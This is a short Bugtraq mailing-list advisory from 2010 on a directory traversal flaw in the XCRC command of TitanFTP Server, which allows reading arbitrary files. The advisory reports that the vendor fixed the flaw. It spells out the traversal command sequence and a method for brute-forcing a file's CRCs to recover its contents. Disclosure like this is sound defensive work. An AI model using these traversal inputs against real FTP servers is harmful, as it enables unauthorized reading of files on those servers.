Bugtraq mailing list archives
TitanFTP Server Arbitrary File Disclosure
From: bill () accensussecurity com
Date: 15 Jun 2010 22:06:37 -0000
Accensus Security Advisory L-02 TitanFtp Server Arbitrary File Disclosure Details ============= Product: TitanFTP Server Security-Risk: high Remote-Exploit: maybe, assuming anonymous ftp access Local-Exploit: yes Vendor URL: http://www.southrivertech.com/ Found By: Bill Finlayson http://www.accensussecurity.com Affected: Versions 8.10.1125 and likely previous Issue: the xcrc command is susceptible to a directory traversal attack which will allow disclosure of the contents of any file on the server Details: xcrc ..//..//..//..//a.txt 1 <some huge number> will disclose the file's size xcrc ..//..//..//..//a.txt 1 2 xcrc ..//..//..//..//a.txt 1 3 ... xcrc ..//..//..//..//a.txt 1 <filesize> when automated allows for an easy brute force attack on the crc's Status: Submitted to Vendor 6/14/10 fixed 6/15/10
Current thread:
- TitanFTP Server Arbitrary File Disclosure bill (Jun 16)